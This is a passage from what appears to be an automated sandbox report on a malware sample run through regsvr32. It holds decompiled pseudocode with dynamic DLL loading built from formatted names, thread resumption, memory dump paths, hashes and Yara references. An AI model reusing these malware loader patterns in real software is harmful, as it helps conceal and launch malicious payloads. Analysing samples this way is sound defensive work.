						_t128 =  *((intOrPtr*)(_t147 + 0x8c));
						_t38 = _t143 + 0xbd5; // 0x6d502511
						_push( *((intOrPtr*)(_t147 + 0xb0)) + 0x1df3);
						_push(_t128 + 0x241);
						_push(_t128 + 0x251);
						_t42 = _t143 + 0x5bf; // 0x6d501efb
						E6D51724F();
						_t147 = _t147 + 0x68;
						 *((intOrPtr*)(_t137 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t137 + 0x88)) + 0x1c)) + 0x1b061;
					}
				}
				return  *((intOrPtr*)(_t147 + 0x4c));
			}



















            0x6d51a07f
            0x6d51a08d
            0x6d51a093
            0x6d51a099
            0x6d51a0a2
            0x6d51a0b3
            0x6d51a0b9
            0x6d51a0bd
            0x6d51a0c3
            0x6d51a0c7
            0x6d51a0cd
            0x6d51a0d3
            0x6d51a0e1
            0x6d51a1e8
            0x6d51a1fd
            0x6d51a235
            0x6d51a257
            0x6d51a26a
            0x6d51a26b
            0x6d51a26d
            0x6d51a26d
            0x6d51a0e7
            0x6d51a0e7
            0x6d51a0f1
            0x6d51a0f5
            0x6d51a0fc
            0x6d51a106
            0x6d51a107
            0x6d51a108
            0x6d51a118
            0x6d51a122
            0x6d51a12c
            0x6d51a12d
            0x6d51a13d
            0x6d51a13e
            0x6d51a143
            0x6d51a147
            0x6d51a14f
            0x6d51a156
            0x6d51a15d
            0x6d51a15d
            0x6d51a164
            0x6d51a16b
            0x6d51a172
            0x6d51a173
            0x6d51a17a
            0x6d51a17b
            0x6d51a18b
            0x6d51a192
            0x6d51a193
            0x6d51a199
            0x6d51a1a1
            0x6d51a1b4
            0x6d51a1bb
            0x6d51a1c2
            0x6d51a1c3
            0x6d51a1ca
            0x6d51a1d5
            0x6d51a1e0
            0x6d51a1e0
            0x6d51a0e1
            0x6d51a27d

            APIs
            • ActivateActCtx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6D50193C,?,?,?,?), ref: 6D51A235
            • ResumeThread.KERNEL32(?,?,?,?), ref: 6D51A26D
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ActivateResumeThread
            • String ID: [ Pm
            • API String ID: 2475288038-2361217518
            • Opcode ID: a023ff0076ea37238bbd7245d655c8925f9e39c9c9fb96a15f9315bc7cb49a12
            • Instruction ID: f36e8007d197fab6f30abf2e97706bcf3353a6a97da4c688237e00c97e0fcadc
            • Opcode Fuzzy Hash: a023ff0076ea37238bbd7245d655c8925f9e39c9c9fb96a15f9315bc7cb49a12
            • Instruction Fuzzy Hash: 7E511872504605AFD711CB68CC85EDBB3ECFB88304F040A6AF99AD7241D735FA458B65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AD31D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E027AD31D(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x27bf8e4; // 0x47ffc00
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E027A9F8F(_t50, 0x2e4);
					_t66 =  *0x27bf8e4; // 0x47ffc00
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E027A9FEE( &_v140, 0x40, L"%08x", E027AE3C8(_t66 + 0xb0, E027AA5DA(_t66 + 0xb0), 0));
					_t20 =  *0x27bf8e4; // 0x47ffc00
					asm("sbb eax, eax");
					_t25 = E027A9F8F(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000034) + 0xaaa);
					_t26 =  *0x27bf8e4; // 0x47ffc00
					_t68 = E027A9BF7(_t26 + 0x1020);
					_v12 = _t68;
					E027A8D41( &_v8);
					_t32 =  *0x27bf8e4; // 0x47ffc00
					_t34 = E027A9BF7(_t32 + 0x122a);
					 *0x27bf9e4 = _t34;
					_t35 =  *0x27bf8e0; // 0x47ff8c0
					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x27bc9d8,  &_v140, ".", L"dll", 0, 0x27bc9d8, _t25, 0x27bc9d8, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x27bf9e4);
					 *0x27bf9dc = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E027AF10E(0x27bcbc4, _t60);
					}
					 *0x27bf9e0 = _t38;
					E027A8D86( &_v12, 0xfffffffe);
					E027A8F0A( &_v140, 0, 0x80);
					if( *0x27bf9e0 != 0) {
						goto L10;
					} else {
						E027A8D86(0x27bf9e4, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x27bf9e0 == 0) {
						_t46 =  *0x27bf918; // 0x47ffa00
						 *0x27bf9e0 = _t46;
					}
					L10:
					return 1;
				}
			}

























            0x027ad31d
            0x027ad31d
            0x027ad31d
            0x027ad320
            0x027ad32c
            0x027ad337
            0x027ad353
            0x027ad358
            0x027ad361
            0x027ad363
            0x027ad36b
            0x027ad38c
            0x027ad391
            0x027ad39e
            0x027ad3a9
            0x027ad3b7
            0x027ad3c8
            0x027ad3ce
            0x027ad3d1
            0x027ad3e8
            0x027ad3f4
            0x027ad3fc
            0x027ad403
            0x027ad409
            0x027ad415
            0x027ad41b
            0x027ad422
            0x027ad435
            0x027ad424
            0x027ad424
            0x027ad427
            0x027ad42d
            0x027ad432
            0x027ad437
            0x027ad442
            0x027ad454
            0x027ad466
            0x00000000
            0x027ad468
            0x027ad46f
            0x00000000
            0x027ad475
            0x027ad476
            0x027ad476
            0x027ad47d
            0x027ad47f
            0x027ad484
            0x027ad484
            0x027ad489
            0x027ad48d
            0x027ad48d

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: LibraryLoad
            • String ID: %08x$dll
            • API String ID: 1029625771-2963171978
            • Opcode ID: 6d90a328ec1a9a8b14316e7729e942622bf11f264453f031ab56fd4cce5864aa
            • Instruction ID: 911d273b3295935d925252c9161cd268186ed5191526cc28bd918cd8b81992c8
            • Opcode Fuzzy Hash: 6d90a328ec1a9a8b14316e7729e942622bf11f264453f031ab56fd4cce5864aa
            • Instruction Fuzzy Hash: 06312EB1E40104BFE712DB58DC49F9A33EDEB89764F14C636F504D3580DB3499548B61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027B36F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55stringCOMMON
            Download Yara Rule
            C-Code - Quality: 47%
            			E027B36F2(void* __eflags, long long __fp0, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				char _v5;
				long long _v12;
				short _v20;
				signed int _t15;
				void* _t16;
				signed int _t22;
				char _t25;
				void* _t26;
				signed int _t28;
				intOrPtr _t29;
				void* _t31;
				char** _t32;
				long long _t40;
				long long _t41;

				_t40 = __fp0;
				_t15 = E027B360B(_a4);
				 *_t32 = "msxml32.dll";
				_t28 = _t15 & 0x0fffffff;
				_t16 = E027AA5DA();
				_t26 = 0xf;
				_t25 = 0;
				_v5 = 0;
				if(_t16 > _t26) {
					L2:
					_t3 = _t25 + 0x41; // 0x41
					 *((char*)(_t31 + _t25 - 0x10)) = _t3;
					_t25 = _t25 + 1;
				} else {
					_t26 = _t16;
					if(_t26 != 0) {
						do {
							goto L2;
						} while (_t25 < _t26);
					}
				}
				lstrlenW( &_v20);
				_t29 = _a8;
				_t22 = _a12 - _t29 + 1;
				_a12 = _t22;
				asm("fild dword [ebp+0x10]");
				if(_t22 < 0) {
					_t40 = _t40 +  *0x27bcf90;
				}
				_a12 = _t28;
				_v12 = _t40;
				_t41 = _v12;
				asm("fild dword [ebp+0x10]");
				if(_t28 < 0) {
					_t41 = _t41 +  *0x27bcf90;
				}
				_v12 = _t41;
				asm("fmulp st1, st0");
				L027B89B5();
				return _t29 - _t22;
			}

















            0x027b36f2
            0x027b36fd
            0x027b3704
            0x027b370b
            0x027b3711
            0x027b3719
            0x027b371a
            0x027b371c
            0x027b3721
            0x027b3729
            0x027b3729
            0x027b372c
            0x027b3730
            0x027b3723
            0x027b3723
            0x027b3727
            0x027b3729
            0x00000000
            0x00000000
            0x027b3729
            0x027b3727
            0x027b3739
            0x027b3742
            0x027b3747
            0x027b374a
            0x027b374d
            0x027b3750
            0x027b3752
            0x027b3752
            0x027b3758
            0x027b375b
            0x027b375e
            0x027b3761
            0x027b3766
            0x027b3768
            0x027b3768
            0x027b376e
            0x027b377a
            0x027b377c
            0x027b3788

            APIs
            • lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 027B3739
            • _ftol2_sse.MSVCRT ref: 027B377C
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: _ftol2_sselstrlen
            • String ID: msxml32.dll
            • API String ID: 1292649733-2051705522
            • Opcode ID: e847ebb7b8d001057a1402fea8c7174c5d6dfe0438827b5a188205849d5ac951
            • Instruction ID: e95bbaf71079acd5ed2dbd869946906b0eb7c78302439be98e7fa5e70e7d5bfe
            • Opcode Fuzzy Hash: e847ebb7b8d001057a1402fea8c7174c5d6dfe0438827b5a188205849d5ac951
            • Instruction Fuzzy Hash: AD112972F0028AEBCF039F68E8486DE7F75FF45310F1685D9D96482641EB30D1A08740
            Uniqueness

            Uniqueness Score: -1.00%